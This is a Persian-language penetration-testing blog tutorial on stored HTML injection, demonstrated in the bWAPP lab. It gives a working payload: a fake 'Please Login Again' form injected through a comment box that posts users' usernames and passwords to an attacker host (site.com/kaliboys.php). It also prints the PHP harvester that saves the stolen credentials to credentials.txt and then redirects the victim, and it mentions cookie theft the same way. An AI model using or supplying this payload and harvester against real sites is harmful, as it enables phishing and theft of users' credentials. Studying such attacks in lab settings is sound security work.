امنیتتست نفوذ

HTML Injection چگونه است؟ و یک مثال ساده از آن

معرفی کوتاه HTML Injection چیست؟

اکثر دوستان از من سؤال می کنند که چگونه می توانیم با استفاده از آسیب پذیری تزریق HTML اطلاعات حساس را به دست آوریم؟ بنابراین در اینجا می خواهیم یک تکنیک بسیار ساده را به شما نشان دهیم که با استفاده از آن یک مهاجم می تواند اعتبار کاربر یا داده های حساس را بدست آورد.

تزریق HTML نوعی تزریق است که وقتی کاربر قادر به کنترل یک نقطه ورودی در وب سایت است و می تواند کد HTML دلخواه خود را به یک نقطه آسیب پذیر وب سایت تزریق کند، رخ می دهد.

نقاط تزریق چیست؟

سایت های مختلف دارای فرم ثبت نام، نوار جستجو یا بخش نظرات هستند که مکان های مناسبی برای آزمایش تزریق html هستند.

بنابراین در اینجا ما قصد داریم از محیط آزمایشگاهی bwapp به منظور آزمایش خود استفاده کنیم. بعد از انتخاب نوع حمله در محیط bwapp، کد زیر را در آن وارد می کنیم.

<p>Sorry,Please Login Again</p></br> 
<form method="post" action="http://site.com/kaliboys.php">
Username<input type="text" name="username"></br>
Password<input type="password" name="password"></br>
<input type="submit" value="Submit">
</form>
در تصویر بالا، مهاجم پیلود خود را از طریق باکس دیدگاه وارد می کند
در تصویر بالا، مهاجم پیلود خود را از طریق باکس دیدگاه وارد می کند

پس از اجرای پیلود، هر کاربر که به وب سایت می رود، فرم ذخیره شده توسط مهاجم را دریافت می کند، که در تصویر زیر آورده شده است.

html inection kaliboys.com  - HTML Injection چگونه است؟ و یک مثال ساده از آن

اکنون مهاجم باید منتظر بماند تا کاربر اطلاعات خود را وارد کند. اما مهاجمان چگونه اطلاعات وارد شده کاربران را دریافت می کنند؟ این سؤالی است که اگر کد بالا را به درستی بررسی کنید، پرونده ای به نام kaliboys.php وجود دارد که در سرور مهاجمین میزبانی شده است. در kaliboys.php یک فایل credentials.txt ایجاد شده که داده ها و اطلاعات به طور خودکار در آن پرونده قرار می گیرند.

<?php
 file_put_contents("credentials.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
 header('Location: http://example.com');
 exit();

اکنون بعد از وارد کردن اطلاعات توسط کاربرد در فرم بالا، می توانید پرونده credentials.txt را بررسی کنید. که در تصویر زیر اطلاعات قربانی را میتوانید مشاهده کنید.

html injection0 pentestguy.in  - HTML Injection چگونه است؟ و یک مثال ساده از آن
همچنین می توانید با استفاده از تزریق html کوکی قربانی را نیز دریافت کنید. امیدوارم که برای شما مفید واقع شود .

یوسف وفایی

فارغ التحصیل کارشناسی IT، علاقه مند به برنامه نویسی و علم امنیت، عاشق یادگیری حرفه های جدید، کنجکاو برای همه چیز، همچنین همیشه تلاش میکنم تا به هدفم برسم...

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *


دکمه بازگشت به بالا